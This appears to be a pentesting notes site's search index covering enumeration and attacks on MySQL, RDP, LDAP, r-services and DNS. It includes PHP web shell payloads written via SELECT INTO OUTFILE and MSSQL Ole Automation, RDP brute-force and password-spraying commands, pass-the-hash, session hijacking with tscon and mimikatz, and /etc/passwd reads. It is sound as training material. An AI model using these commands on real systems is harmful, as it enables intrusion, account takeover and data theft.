                        Content Filtering: Squid can be used for content filtering and blocking access to specific websites or categories of websites (e.g., social media, adult content). This feature is often used by organizations to enforce acceptable use policies.

                        ","tags":["pentesting","web pentesting","port 3128","proxy"]},{"location":"3128-squid/#enumeration","title":"Enumeration","text":"
                        # Proxify curl\ncurl -x -proxy http://$ip$:3128 http://$ip$ -H \"User-Agent:Firefox\"\n
                        ","tags":["pentesting","web pentesting","port 3128","proxy"]},{"location":"3306-mariadb-mysql/","title":"3306 mariaDB - mySQL","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#description","title":"Description","text":"

                        MySQL: MySQL is an open-source relational database management system(RDBMS) based on Structured Query Language (SQL). It is developed and managed by oracle corporation and initially released on 23 may, 1995. It is widely being used in many small and large scale industrial applications and capable of handling a large volume of data. After the acquisition of MySQL by Oracle, some issues happened with the usage of the database and hence MariaDB was developed.

                        MariaDB: MariaDB is an open source relational database management system (RDBMS) that is a compatible drop-in replacement for the widely used MySQL database technology. It is developed by MariaDB Foundation and initially released on 29 October 2009. MariaDB has a significantly high number of new features, which makes it better in terms of performance and user-orientation than MySQL.

                        sudo nmap $ip -sV -sC -p3306 --script mysql*\n
                        sudo nmap -sS -sV --script mysql-empty-password -p 3306 $ip\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#connect-to-database-mariadb","title":"Connect to database: mariadb","text":"
                        # -h host/ip   \n# -u user As default mariadb has a root user with no authentication\nmariadb -h <host/IP> -u root\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#connect-to-database-mysql","title":"Connect to database: mysql","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#from-linux","title":"From Linux","text":"
                        # -h host/ip   \n# -u user As default mysql has a root user with no authentication\nmysql --host=INSTANCE_IP --user=root --password=thepassword\nmysql -h <host/IP> -u root -p<password>\n\nmysql -u root -h <host/IP>\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#from-windows","title":"From windows","text":"
                        mysql.exe -u username -pPassword123 -h $IP\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mariadb-commands","title":"mariadb commands","text":"
                        # Get all databases\nshow databases;\n\n# Select a database\nuse <databaseName>;\n\n# Get all tables from the previously selected database\nshow tables; \n\n# Dump columns from a table\ndescribe <table_name>;\n\n# Dump columns from a table\nshow columns from <table>;\n\n# Select column from table\nselect usename,password from users;\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#upload-a-shell","title":"Upload a shell","text":"

                        Take a wordpress installation that uses a mysql database. If you manage to login into the mysql panel (/phpmyadmin) as root then you could upload a php shell to the /wp-content/uploads/ folder.

                        Select \"<?php echo shell_exec($_GET['cmd']);?>\" into outfile \"/var/www/https/blogblog/wp-content/uploads/shell.php\";\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mysql-basic-commands","title":"mysql basic commands","text":"

                        See mysql.

                        # Show datases\nSHOW databases;\n\n# Show tables\nSHOW tables;\n\n# Create new database\nCREATE DATABASE nameofdatabase;\n\n# Delete database\nDROP DATABASE nameofdatabase;\n\n# Select a database\nUSE nameofdatabase;\n\n# Show tables\u00e7\nSHOW tables;\n\n# Dump content from nameOftable\nSELECT * FROM NameOfTable\n\n# Create a table with some columns in the previously selected database\nCREATE TABLE person(nombre VARCHAR(255), edad INT, id INT);\n\n# Modify, add, or remove a column attribute of a table\nALTER TABLE persona MODIFY edad VARCHAR(200);\nALTER TABLE persona ADD description VARCHAR(200);\nALTER TABLE persona DROP edad VARCHAR(200);\n\n# Insert a new row with values in a table\nINSERT INTO persona VALUES(\"alvaro\", 54, 1);\n\n# Show all rows from table\nSELECT * FROM persona\n\n# Select a row from a table filtering by the value of a given column\nSELECT * FROM persona WHERE nombre=\"alvaro\";\n\n# JOIN query\nSELECT * FROM oficina JOIN persona ON persona.id=oficina.user_id;\n\n# UNION query. This means, for an attack, that the number of columns has to be the same\nSELECT * FROM oficina UNION SELECT * from persona;\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#enumeration-queries","title":"Enumeration queries","text":"
                        # Show current user\ncurrent_user()\nuser()\n\n# Show current database\ndatabase()\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#command-execution","title":"Command execution","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#writing-files","title":"Writing files","text":"

                        MySQL\u00a0supports\u00a0User Defined Functions\u00a0which allows us to execute C/C++ code as a function within SQL, there's one User Defined Function for command execution in this\u00a0GitHub repository.

                        MySQL\u00a0does not have a stored procedure like\u00a0xp_cmdshell, but we can achieve command execution if we write to a location in the file system that can execute our commands.

                        • If MySQL\u00a0operates on a PHP-based web server or other programming languages like ASP.NET, having the appropriate privileges, attempt to write a file using\u00a0SELECT INTO OUTFILE\u00a0in the webserver directory.
                        • Browse to the location where the file is and execute the commands.
                         SELECT \"<?php echo shell_exec($_GET['c']);?>\" INTO OUTFILE '/var/www/html/webshell.php';\n
                        • In\u00a0MySQL, a global system variable\u00a0secure_file_priv\u00a0limits the effect of data import and export operations, such as those performed by the\u00a0LOAD DATA\u00a0and\u00a0SELECT \u2026 INTO OUTFILE\u00a0statements and the\u00a0LOAD_FILE()\u00a0function. These operations are permitted only to users who have the\u00a0FILE\u00a0privilege.
                        • Settings in the secure_file_priv:
                          • If empty, the variable has no effect, which is not a secure setting as we can read and write data using\u00a0MySQL:

                            show variables like \"secure_file_priv\";\n
                        +------------------+-------+\n| Variable_name    | Value |\n+------------------+-------+\n| secure_file_priv |       |\n+------------------+-------+\n
                        # To write files using MSSQL, we need to enable Ole Automation Procedures, which requires admin privileges, and then execute some stored procedures to create the file:\n\nsp_configure 'show advanced options', 1;\nRECONFIGURE;\nsp_configure 'Ole Automation Procedures', 1;\nRECONFIGURE;\n\n# Using MSSQL to Create a File\nDECLARE @OLE INT;\nDECLARE @FileID INT;\nEXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT;\nEXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\\inetpub\\wwwroot\\webshell.php', 8, 1;\nEXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET[\"c\"]);?>';\nEXECUTE sp_OADestroy @FileID;\nEXECUTE sp_OADestroy @OLE;\n
                        • If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.
                        • If set to NULL, the server disables import and export operations.
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#reading-files","title":"Reading files","text":"","tags":["mariadb","port 3306","mysql"]},{"location":"3306-mariadb-mysql/#mysql-read-local-files-in-mysql","title":"MySQL - Read Local Files in MySQL","text":"

                        If permissions allows it:

                        select LOAD_FILE(\"/etc/passwd\");\n
                        ","tags":["mariadb","port 3306","mysql"]},{"location":"3389-rdp/","title":"3389 rdp","text":"","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#description","title":"Description","text":"

                        source: https://book.hacktricks.xyz/network-services-pentesting/pentesting-rdp and HackTheBox Academy.

                        Basic information about RDP service: Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software (from here).

                        Name Description port 3389/TCP state open service ms-wbt-server version Microsoft Terminal Services Banner rdp-ntlm-info

                        RDP works at the application layer in the TCP/IP reference model, typically utilizing TCP port 3389 as the transport protocol. However, the connectionless UDP protocol can use port 3389 also for remote administration. The Remote Desktop service is installed by default on Windows servers and does not require additional external applications. This service can be activated using the Server Manager and comes with the default setting to allow connections to the service only to hosts with Network level authentication (NLA).

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#enumeration","title":"Enumeration","text":"

                        To check the available encryption and DoS vulnerability (without causing DoS to the service) and obtains NTLM Windows info (versions).

                        nmap uses RDPcookies (mstshash=nmap) to interact with the RDP server. These cookies can be identified by security services such as EDRs, and can lock us out, so we need to think twice before running that scan.

                        nmap -Pn -sV -p3389 --script rdp-*  $ip\n

                        Results:

                        PORT     STATE SERVICE       VERSION\n3389/tcp open  ms-wbt-server Microsoft Terminal Services\n| rdp-enum-encryption:\n|   Security layer\n|     CredSSP (NLA): SUCCESS\n|     CredSSP with Early User Auth: SUCCESS\n|_    RDSTLS: SUCCESS\n| rdp-ntlm-info:\n|   Target_Name: EXPLOSION\n|   NetBIOS_Domain_Name: EXPLOSION\n|   NetBIOS_Computer_Name: EXPLOSION\n|   DNS_Domain_Name: Explosion\n|   DNS_Computer_Name: Explosion\n|   Product_Version: 10.0.17763\n|_  System_Time: 2022-11-11T12:16:26+00:00\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n

                        rdp-sec-check.pl is a perl script to enumerate security settings of an RDP Service (AKA Terminal Services).

                        git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check\n\n./rdp-sec-check.pl $ip\n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#connection-with-rdp","title":"Connection with rdp","text":"

                        To run Microsoft\u2019s Remote Desktop Protocol (RDP) client, a command-line interface called Microsoft Terminal Services Client (MSTSC) is used. We can connect to RDP servers on Linux using xfreerdp, rdesktop, or Remmina and interact with the GUI of the server accordingly.

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#xfreerdp","title":"xfreerdp","text":"

                        See xfreerdp.

                        We can first try to form an RDP session with the target by not providing any additional information for any switches other than the target IP address. This will make the script use your own username as the login username for the RDP session, thus testing guest login capabilities.

                        xfreerdp /v:$ip\n# /v:$ip: Specifies the target IP of the host we would like to connect to.\n

                        Try to login with other default accounts, such as user, admin, Administrator, and so on. We will also be specifying to the script that we would like to bypass all requirements for a security certificate so that our own script does not request them:

                        xfreerdp /cert:ignore /u:Administrator /v:$ip\n# /cert:ignore : Specifies to the scrips that all security certificate usage should be ignored.\n# /u:Administrator : Specifies the login username to be \"Administrator\".\n# /v:$ip: Specifies the target IP of the host we would like to connect to.\n

                        If successful, during the initialization of the RDP session, we will be asked for a password. We can hit Enter to see if the process continue without one. Sometimes there are severe mishaps in configurations like this and we can gain access.

                        If you know user and credentials:

                        xfreerdp /u:<username> /p:<\"password\"> /v:$ip \n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#brute-force","title":"Brute force","text":"

                        ncrack -vv --user <User> -P pwds.txt rdp://$ip\n\nhydra -V -f -L <userslist> -P <passwlist> rdp://$ip\n\nhydra -L user.list -P password.list rdp://$ip\n
                        Be careful, you could lock accounts

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#password-spraying","title":"Password Spraying","text":"

                        Be careful, you could lock accounts

                        # https://github.com/galkan/crowbar\ncrowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'\n\n# hydra\nhydra -L usernames.txt -p 'password123' 192.168.2.143 rdp\n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#connect-with-known-credentialshash","title":"Connect with known credentials/hash","text":"
                        rdesktop -u <username> $ip\nrdesktop -d <domain> -u <username> -p <password> $ip\nxfreerdp [/d:domain] /u:<username> /p:<password> /v:$ip\nxfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip #Pass the hash\n

                        Check known credentials against RDP services

                        rdp_check.py from impacket let you check if some credentials are valid for a RDP service:

                        rdp_check <domain>/<name>:<password>@$ip\n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#attacks","title":"Attacks","text":"","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#session-stealing","title":"Session stealing","text":"

                        With SYSTEM permissions you can access any opened RDP session by any user without need to know the password of the owner.

                        Get openned sessions:

                        query user\n

                        Access to the selected session

                        tscon <ID> /dest:<SESSIONNAME>\n

                        Now you will be inside the selected RDP session and you will have impersonate a user using only Windows tools and features.

                        Important: When you access an active RDP sessions you will kickoff the user that was using it. You could get passwords from the process dumping it, but this method is much faster and led you interact with the virtual desktops of the user (passwords in notepad without been saved in disk, other RDP sessions opened in other machines...)

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#mimikatz","title":"Mimikatz","text":"

                        You could also use mimikatz to do this:

                        ts::sessions #Get sessions\nts::remote /id:2 #Connect to the session\n

                        Sticky-keys & Utilman Combining this technique with stickykeys or utilman you will be able to access a administrative CMD and any RDP session anytime

                        You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#rdp-process-injection","title":"RDP Process Injection","text":"

                        If someone from a different domain or with better privileges login via RDP to the PC where you are an Admin, you can inject your beacon in his RDP session process and act as him:

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#rdp-sessions-abuse","title":"RDP Sessions Abuse","text":"
                        # Adding User to RDP group\nnet localgroup \"Remote Desktop Users\" UserLoginName /add\n
                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"3389-rdp/#shadow-attack","title":"Shadow Attack","text":"

                        AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

                        https://github.com/JoelGMSec/AutoRDPwn

                        ","tags":["rdp","port 3389","mimikatz"]},{"location":"389-636-ldap/","title":"389 - 636 LDAP","text":"

                        Application protocol used for accessing, modifying and querying distributed\u00a0directory information services (such as Active Directory) over a TCP/Internet Protocol\u00a0(IP) network. A Directory service would be a database-like virtual storage that holds data in a specific hierarchical structure. LDAP structure is based on a tree of directory entries.

                        Lightweight Directory Access Protocol (LDAP) is an integral part of Active Directory (AD). The\u00a0Lightweight Directory Access Protocol\u00a0(LDAP)\u00a0is an open, vendor-neutral, industry standard\u00a0application protocol for accessing and maintaining distributed\u00a0directory information services over a TCP/IP\u00a0Internet Protocol\u00a0(IP) network.

                        LDAP runs on port 389 (unencrypted connections) and 636 (LDAP SSL.)

                        The relationship between AD and LDAP can be compared to Apache and HTTP. The same way Apache is a web server that uses the HTTP protocol, Active Directory is a directory server that uses the LDAP protocol. While uncommon, you may come across organizations while performing an assessment that does not have AD but does have LDAP, meaning that they most likely use another type of LDAP server such as OpenLDAP.

                        • TCP and UDP port 389 and 636.
                        • It's a binary protocol and by default not encrypted.
                        • Has been updated to include encryptions addons, as Transport Layer Security (TLS)/SSL and can be tunnelled through SSH

                        The hierarchy (tree) of information stored via LDAP is known as the Directory Information Tree (DIT). That structure is defined in a schema.

                        A common use of LDAP is to provide a central place to store usernames and passwords. This allows many different applications and services to connect to the LDAP server to validate users.

                        The latest LDAP specification is Version 3, which is published as RFC 4511. AD stores user account information and security information such as passwords and facilitates sharing this information with other devices on the network. LDAP is the language that applications use to communicate with other servers that also provide directory services. In other words, LDAP is a way that systems in the network environment can \"speak\" to AD.

                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ad-ldap-authentication","title":"AD LDAP Authentication","text":"

                        LDAP is set up to authenticate credentials against AD using a \"BIND\" operation to set the authentication state for an LDAP session. There are two types of LDAP authentication.

                        1. Simple Authentication: This includes anonymous authentication, unauthenticated authentication, and username/password authentication. Simple authentication means that a username and password create a BIND request to authenticate to the LDAP server.

                        2. SASL Authentication: The Simple Authentication and Security Layer (SASL) framework uses other authentication services, such as Kerberos, to bind to the LDAP server and then uses this authentication service (Kerberos in this example) to authenticate to LDAP. The LDAP server uses the LDAP protocol to send an LDAP message to the authorization service which initiates a series of challenge/response messages resulting in either successful or unsuccessful authentication. SASL can provide further security due to the separation of authentication methods from application protocols.

                        LDAP authentication messages are sent in cleartext by default so anyone can sniff out LDAP messages on the internal network. It is recommended to use TLS encryption or similar to safeguard this information in transit.

                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldif-file","title":"LDIF file","text":"

                        Example of a LDIF file:

                        dn: dc=example,dc=com\nobjectclass: top\nobjectclass: domain\ndc: example\n\ndn: ou=People, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: People\naci: (targetattr=\"*||+\")(version 3.0; acl \"IDM Access\"; allow (all)\n  userdn=\"ldap:///uid=idm,ou=Administrators,dc=example,dc=com\";)\n\ndn: uid=jgibbs, ou=People, dc=example,dc=com\nuid: jgibbs\ncn: Joshamee Gibbs\nsn: Gibbs\ngivenname: Joshamee\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\nmail: jgibbs@blackpearl.com\ntelephonenumber: +1 408 555 1234\nfacsimiletelephonenumber: +1 408 555 4321\nuserpassword: supersecret\n\ndn: uid=hbarbossa, ou=People, dc=example,dc=com\nuid: hbarbossa\ncn: Hector Barbossa\nsn: Barbossa\ngivenname: Hector\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\no: Brethren Court\nmail: captain.barbossa@example.com\ntelephonenumber: +421 910 382734\nfacsimiletelephonenumber: +1 408 555 1111\nroomnumber: 111\nuserpassword: deadjack\n\n# Note:\n# Lord Bectett is an exception to the cn = givenName + sn rule\n\ndn: uid=jbeckett, ou=People, dc=example,dc=com\nuid: jbeckett\ncn: Lord Cutler Beckett\nsn: Beckett\ngivenname: Cutler\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nl: Caribbean\no: East India Trading Co.\nmail: bigboss@eitc.com\ntelephonenumber: +421 910 382333\nfacsimiletelephonenumber: +1 408 555 2222\nroomnumber: 666\nuserpassword: takeovertheworld\n\ndn: ou=Groups, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: Groups\naci: (targetattr=\"*||+\")(version 3.0; acl \"IDM Access\"; allow (all)\n  userdn=\"ldap:///uid=idm,ou=Administrators,dc=example,dc=com\";)\n\ndn: cn=Pirates,ou=groups,dc=example,dc=com\nobjectclass: top\nobjectclass: groupOfUniqueNames\ncn: Pirates\nou: groups\nuniquemember: uid=jgibbs, ou=People, dc=example,dc=com\nuniquemember: uid=barbossa, ou=People, dc=example,dc=com\ndescription: Arrrrr!\n\ndn: ou=Administrators, dc=example,dc=com\nobjectclass: top\nobjectclass: organizationalunit\nou: Administrators\n\ndn: uid=idm, ou=Administrators,dc=example,dc=com\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\nuid: idm\ncn: IDM Administrator\nsn: IDM Administrator\ndescription: Special LDAP acccount used by the IDM\n  to access the LDAP data.\nou: Administrators\nuserPassword: secret\nds-privilege-name: unindexed-search\n

                        Ldap operators:

                        Operator Description = Equal to | Logical OR ! Logical NOT & Logical AND * Wildcard, any strings or character

                        Example: any surname starting by \"a\" or canonical name starting by \"b.\"

                        (|(sn=a*)(cn=b*))\n
                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldap-queries-ldapfilter","title":"LDAP queries: LDAPFilter","text":"

                        By combining the \"Get-ADObject\" cmdlet with the \"LDAPFilter\" parameter in powershell we can perform some ldap queries via powershell.

                        Get-ADObject -LDAPFilter <FILTER> | select cn\n

                        Some useful LDAPFilters:

                        Search for LDAP query Find All Workstations ' (objectCategory=computer)' Find All DomainControllers '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))' Search for LDAP query Find All Users ' (&(objectCategory=person)(objectClass=user))' Filnd All Contacts '(objectClass=contact)' Find All Users and Contacts '(objectClass=user)' List Disabled Users '(userAccountControl:1.2.840.113556.1.4.803:=2)' Search for LDAP query Find All Groups '(objectClass=group)' Find direct members of a Security Group '(memberOf=CN=Admin,OU=Security,DC=DOM,DC=NT)'

                        More:

                        • LDAP Queries related to AD computers
                        • LDAP queries related to AD users.
                        • LDAP queries related to AD groups.
                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#ldap-queries-search-filters","title":"LDAP queries: Search Filters","text":"

                        The LDAPFilter parameter with the same cmdlets lets us use LDAP search filters when searching for information.

                        Operators:

                        • & -> and
                        • | -> or
                        • ! -> not

                        AND Operation:

                        • One criteria: (& (..C1..) (..C2..))
                        • More than two criteria: (& (..C1..) (..C2..) (..C3..))

                        OR Operation:

                        • One criteria: (| (..C1..) (..C2..))
                        • More than two criteria: (| (..C1..) (..C2..) (..C3..))
                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#filters","title":"Filters","text":"Criteria Rule Example Equal to (attribute=123) (&(objectclass=user)(displayName=Smith) Not equal to (!(attribute=123)) !objectClass=group) Present (attribute=*) (department=*) Not present (!(attribute=*)) (!homeDirectory=*) Greater than (attribute>=123) (maxStorage=100000) Less than (attribute<=123) (maxStorage<=100000) Approximate match (attribute~=123) (sAMAccountName~=Jason) Wildcards (attribute=*A) (givenName=*Sam)","tags":["active","directory","ldap","windows","port","389"]},{"location":"389-636-ldap/#exploiting-vulndap","title":"Exploiting vuLnDAP","text":"

                        https://github.com/digininja/vuLnDAP

                        All schema for querying is in https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html

                        Examples:

                        ","tags":["active","directory","ldap","windows","port","389"]},{"location":"43-whois/","title":"Port 43 - whois","text":"

                        It is a TCP-based transaction-oriented query/response protocol listening on TCP port 43 by default. We can use it for querying databases containing domain names, IP addresses, or autonomous systems and provide information services to Internet users.

                        The Internet Corporation of Assigned Names and Numbers (ICANN) requires that accredited registrars enter the holder's contact information, the domain's creation, and expiration dates, and other information in the Whois database immediately after registering a domain. In simple terms, the Whois database is a searchable list of all domains currently registered worldwide.

                        Sysinternals WHOIS for Windows or Linux WHOIS command-line utility are our preferred tools for gathering information. However, there are some online versions like whois.domaintools.com we can also use.

                        # linux\nwhois $TARGET\n\n# windows\nwhois.exe $TARGET\n
                        ","tags":["port 111","rpc","NFS","Network File System"]},{"location":"512-513-514-r-services/","title":"512 r services","text":"

                        R-services span across the ports 512, 513, and 514 and are only accessible through a suite of programs known as r-commands. R-Services are a suite of services hosted to enable remote access or issue commands between Unix hosts over TCP/IP.

                        r-services were the de facto standard for remote access between Unix operating systems until they were replaced by the Secure Shell (SSH) protocols and commands due to inherent security flaws built into them. They are most commonly used by commercial operating systems such as Solaris, HP-UX, and AIX. While less common nowadays, we do run into them from time to time.

                        The R-commands suite consists of the following programs:

                        • rcp (remote copy)
                        • rexec (remote execution)
                        • rlogin (remote login)
                        • rsh (remote shell)
                        • rstat
                        • ruptime
                        • rwho (remote who).

                        These are the most frequently abused commands:

                        Command Service Daemon Port Transport Protocol Description rcp rshd 514 TCP Copy a file or directory bidirectionally from the local system to the remote system (or vice versa) or from one remote system to another. It works like the cp command on Linux but provides no warning to the user for overwriting existing files on a system. rsh rshd 514 TCP Opens a shell on a remote machine without a login procedure. Relies upon the trusted entries in the /etc/hosts.equiv and .rhosts files for validation. rexec rexecd 512 TCP Enables a user to run shell commands on a remote machine. Requires authentication through the use of a username and password through an unencrypted network socket. Authentication is overridden by the trusted entries in the /etc/hosts.equiv and .rhosts files. rlogin rlogind 513 TCP Enables a user to log in to a remote host over the network. It works similarly to telnet but can only connect to Unix-like hosts. Authentication is overridden by the trusted entries in the /etc/hosts.equiv and .rhosts files.

                        The /etc/hosts.equiv file contains a list of trusted hosts and is used to grant access to other systems on the network.

                        "},{"location":"512-513-514-r-services/#footprinting-r-services","title":"Footprinting r-services","text":"
                        sudo nmap -sV -p 512,513,514 $ip\n

                        Even though, these services utilize Pluggable Authentication Modules (PAM) for user authentication onto a remote system by default, they also bypass this authentication through the use of the /etc/hosts.equiv and .rhosts files on the system.

                        If any misconfiguration exists on those files, we could get access to those services.

                        # Example of a misconfiguration in rhosts file:\n\nhtb-student     10.0.17.5\n+               10.0.17.10\n+               +\n\n# The file follows the specific syntax of `<username> <ip address>` or `<username> <hostname>` pairs. Additionally, the `+` modifier can be used within these files as a wildcard to specify anything. In this example, the `+` modifier allows any external user to access r-commands from the `htb-student` user account via the host with the IP address `10.0.17.10`.\n
                        "},{"location":"512-513-514-r-services/#accessing-the-service","title":"Accessing the service","text":"
                        # Login \nrlogin $ip -l <username>\n\n# list all interactive sessions on the local network by sending requests to the UDP port 513\nrwho\n\n#  detailed account of all logged-in users over the network, including information such as the username, hostname of the accessed machine, TTY that the user is logged in to, the date and time the user logged in, the amount of time since the user typed on the keyboard, and the remote host they logged in from (if applicable).\nrusers -al $ip\n
                        "},{"location":"53-dns/","title":"Port 53 - Domain Name Server (DNS)","text":"

                        Globally distributed DNS servers translate domain names into IP addresses and thus control which server a user can reach via a particular domain. There are several types of DNS servers that are used worldwide:

                        Server Type Description DNS Root Server Root servers of DNS are responsible for the top-level domains (TLD). As the last instance, they are only requested if the name server does not respond. The ICANN coordinates the work of the root name servers. There are 13 such root servers around the globe. Authoritative Nameserver Authoritative name servers hold authority for a particular zone. They only answer queries from their area of responsibility, and their information is binding. If an authoritative name server cannot answer a client's query, the root name server takes over at that point. Non-authoritative Nameserver Non-authoritative name servers are not responsible for a particular DNS zone. Instead, they collect information on specific DNS zones themselves, which is done using recursive or iterative DNS querying. Caching DNS Server Caching DNS servers cache information from other name servers for a specified period. The authoritative name server determines the duration of this storage. Forwarding Server Forwarding servers perform only one function: they forward DNS queries to another DNS server. Resolver Resolvers are not authoritative DNS servers but perform name resolution locally in the computer or router.","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#resource-records","title":"Resource records","text":"

                        A resource record is a four-tuple that contains the following 4 fields:

                        (Name, Value, Type, TTL)\n
                        • A records: If Type=A, then Name is a hostname and Value is the IP address for that name. We recognize the IP addresses that point to a specific (sub)domain through the A record. Example:
                        (relay1.bar.example.com, 145.222.36.125, A)\n
                        • MX records: If Type=MX, then Value is the canonical name of a mail server that has an alias hostname Name. The mail server records show us which mail server is responsible for managing the emails for the company. Example:

                          (example.com,mail.bar.example.com,MX)\n

                        • NS records: If Type=NS, then Name is a domain (such as example.com) and Value is the name of an authoritative DNS server that knows how to obtain the IP address for hosts in the domain. These kinds of records show which name servers are used to resolve the FQDN to IP addresses. Most hosting providers use their own name servers, making it easier to identify the hosting provider. Example:

                          (example.com,dns.example.com,NS)\n

                        • CNAME records: If Type=CNAME, then Value is a canonical hostname for the alias hostname Name. Example:

                          (example.com,relay1.bar.example.com,CNAME)\n

                        • TXT records: this type of record often contains verification keys for different third-party providers and other security aspects of DNS, such as SPF, DMARC, and DKIM, which are responsible for verifying and confirming the origin of the emails sent. Here we can already see some valuable information if we look closer at the results.

                        • AAAA records: Returns an IPv6 address of the requested domain.
                        • PTR record: The PTR (Pointer) record works the other way around (reverse lookup). It converts IP addresses into valid domain names. For the IP address to be resolved from the Fully Qualified Domain Name (FQDN), the DNS server must have a reverse lookup file. In this file, the computer name (FQDN) is assigned to the last octet of an IP address, which corresponds to the respective host, using a PTR record. The PTR records are responsible for the reverse translation of IP addresses into names.
                        • SOA records: (Start Of Authority (SOA)). It should be first in a zone file because it indicates the start of a zone. Each zone can only have one SOA record, and additionally, it contains the zone's values, such as a serial number and multiple expiration timeouts. Provides information about the corresponding DNS zone and email address of the administrative contact. The SOA record is located in a domain's zone file and specifies who is responsible for the operation of the domain and how DNS information for the domain is managed.

                        Summarizing:

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#security","title":"Security","text":"

                        DNS is mainly unencrypted. Devices on the local WLAN and Internet providers can therefore hack in and spy on DNS queries. Since this poses a privacy risk, there are now some solutions for DNS encryption. By default, IT security professionals apply DNS over TLS (DoT) or DNS over HTTPS (DoH) here. In addition, the network protocol NSCrypt also encrypts the traffic between the computer and the name server.

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#ips-to-add-to-etcresolvconf","title":"IPs to add to etc/resolv.conf","text":"

                        1.1.1.1 is a public DNS resolver operated by Cloudflare that offers a fast and private way to browse the Internet. Unlike most DNS resolvers, 1.1.1.1 does not sell user data to advertisers. In addition, 1.1.1.1 has been measured to be the fastest DNS resolver available.

                        See DNS enumeration

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#dns-transfer-zones","title":"DNS transfer zones","text":"

                        See dig axfr.

                        ","tags":["scanning","domain","subdomain","pentesting"]},{"location":"53-dns/#dns-server","title":"DNS server","text":"

                        There are many different configuration types for DNS. All DNS servers work with three different types of configuration files:

                        1. local DNS configuration files
                        2. zone files
                        3. reverse name resolution files

                        The DNS server Bind9 is very often used on Linux-based distributions. Its local configuration file (named.conf) is roughly divided into two sections, firstly the options section for general settings and secondly the zone entries for the individual domains. The local configuration files are usually:

                        • /etc/bind/named.conf.local
                        • /etc/bind/named.conf.options
                        • /etc/bind/named.conf.log

                        In the file /etc/bind/named.conf.local we can define the different zones. A zone file is a text file that describes a DNS zone with the BIND file format. In other words it is a point of delegation in the DNS tree. The BIND file format is the industry-preferred zone file format and is now well established in DNS server software. A zone file describes a zone completely. There must be precisely one SOA record and at least one NS record. The SOA resource record is usually located at the beginning of a zone file. The main goal of these global rules is to improve the readability of zone files. A syntax error usually results in the entire zone file being considered unusable. The name server behaves similarly as if this zone did not exist. It responds to DNS queries with a SERVFAIL error message.

                        DNS misconfigurations and vulnerabilities.

                        Option Description allow-query Defines which hosts are allowed to send requests to the DNS server. allow-recursion Defines which hosts are allowed to send recursive requests to the DNS server. allow-transfer Defines which hosts are allowed to receive zone transfers from the DNS server. zone-statistics Collects statistical data of zones.

